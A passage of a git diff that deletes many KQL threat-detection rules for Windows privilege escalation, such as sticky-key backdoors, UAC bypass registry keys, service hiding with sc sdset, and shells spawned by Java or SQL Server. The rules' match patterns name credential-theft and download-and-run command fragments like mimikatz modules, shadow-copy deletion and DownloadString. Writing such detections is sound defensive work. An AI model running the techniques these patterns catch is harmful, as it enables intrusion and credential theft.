-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Privilege Escalation/Sdclt_Child_Processes.kql b/Privilege Escalation/Sdclt_Child_Processes.kql
deleted file mode 100644
index 40ba4dfa..00000000
--- a/Privilege Escalation/Sdclt_Child_Processes.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
deleted file mode 100644
index 7cd541b4..00000000
--- a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/ServiceDll_Hijack.kql b/Privilege Escalation/ServiceDll_Hijack.kql
deleted file mode 100644
index fb9f8be0..00000000
--- a/Privilege Escalation/ServiceDll_Hijack.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/02/04
-// Level: medium
-// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-This is often used as a method of persistence.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql b/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql
deleted file mode 100644
index 3d4deb59..00000000
--- a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql b/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql
deleted file mode 100644
index 0509bca7..00000000
--- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
deleted file mode 100644
index 0a1e634c..00000000
--- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceRegistryEvents
-| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspect_Svchost_Activity.kql b/Privilege Escalation/Suspect_Svchost_Activity.kql
deleted file mode 100644
index 0c14e8e3..00000000
--- a/Privilege Escalation/Suspect_Svchost_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: David Burkett, @signalblur
-// Date: 2019/12/28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql b/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql
deleted file mode 100644
index d536982c..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
-// Tags: attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql b/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql
deleted file mode 100644
index b25dfd18..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql b/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql
deleted file mode 100644
index 8a4f2a41..00000000
--- a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/09/06
-// Level: high
-// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
deleted file mode 100644
index df06d4d8..00000000
--- a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022/05/04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_New_Service_Creation.kql b/Privilege Escalation/Suspicious_New_Service_Creation.kql
deleted file mode 100644
index 2450ee8b..00000000
--- a/Privilege Escalation/Suspicious_New_Service_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql b/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql
deleted file mode 100644
index 02313ce1..00000000
--- a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/01
-// Level: high
-// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
-// Tags: attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceRegistryEvents
-| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey contains "\\CutePDF Writer v4.0" or RegistryKey contains "\\Version-3\\PDF24" or (RegistryKey contains "\\VNC Printer (PS)" or RegistryKey contains "\\VNC Printer (UD)"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql b/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql
deleted file mode 100644
index 20bd7e66..00000000
--- a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/11/11
-// Level: medium
-// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
-// Tags: attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql b/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql b/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql
deleted file mode 100644
index d7bc0338..00000000
--- a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/08/19
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
-// Tags: attack.privilege_escalation, attack.t1546.002
-DeviceProcessEvents
